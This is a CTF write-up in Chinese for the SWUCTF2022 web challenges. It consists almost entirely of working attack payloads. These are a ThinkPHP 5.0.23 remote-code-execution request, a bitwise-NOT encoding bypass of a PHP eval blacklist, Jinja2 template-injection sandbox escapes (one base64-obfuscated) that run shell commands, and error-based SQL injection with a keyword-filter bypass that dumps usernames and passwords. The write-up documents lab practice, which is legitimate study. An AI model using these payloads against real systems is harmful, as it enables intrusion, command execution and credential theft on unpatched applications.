SWUCTF2022 Web Writeup | CTF

SWU解题记录，太菜了太菜了，哭哭

THINKPHP?

?s=captcha

V5.0.23

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=env

PHP? Eval?

<?php
highlight_file(__FILE__);
error_reporting(0);
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
foreach($blacklist as $i){
    if(stristr($_GET[cmd], $i)!==false){
        die('hack');
    }
}
eval($_GET[cmd]);
?>

URL编码取反绕过

php -r "var_dump(urlencode(~'system'));" => string(18) "%8C%86%8C%8B%9A%92"
php -r "var_dump(urlencode(~'cat /flag'));" => string(27) "%9C%9E%8B%DF%D0%99%93%9E%98"

?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

Py?py

引用站外链接

SSTI/沙盒逃逸详细总结-CoCo1er

安全客

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}}

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['ZXZhbA=='.decode('base64')]("X19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IGZsYWcudHh0JykucmVhZCgp".decode('base64'))}}

SQL? no sqlmap

报错注入

'or(updatexml(1,concat(0x7e,version(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%2C1%29%29%23

~10.3.18-MariaDB~

'or(updatexml(1,concat(0x7e,database(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%29%23

~vaalacat~

'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23

过滤了 select

双写绕过

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23

~vaala~

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(column_name))from(information_schema.columns)where(table_name)like('vaala')),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28column_name%29%29from%28information_schema.columns%29where%28table_name%29like%28%27vaala%27%29%29%2C0x7e%29%2C1%29%29%23

~id,username,password~

'or(updatexml(1,concat(0x7e,(selselectect(group_concat(username,'~',password))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28username%2C%27~%27%2Cpassword%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23

‘~vaala~flag{ccb506e8-afa0-46b8-b’

'or(updatexml(1,concat(0x7e,(selselectect(group_concat((right(password,30))))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28%28right%28password%2C30%29%29%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23

‘~8-afa0-46b8-b177-e3a2fc5592b6}~’

flag{ccb506e8-afa0-46b8-b177-e3a2fc5592b6}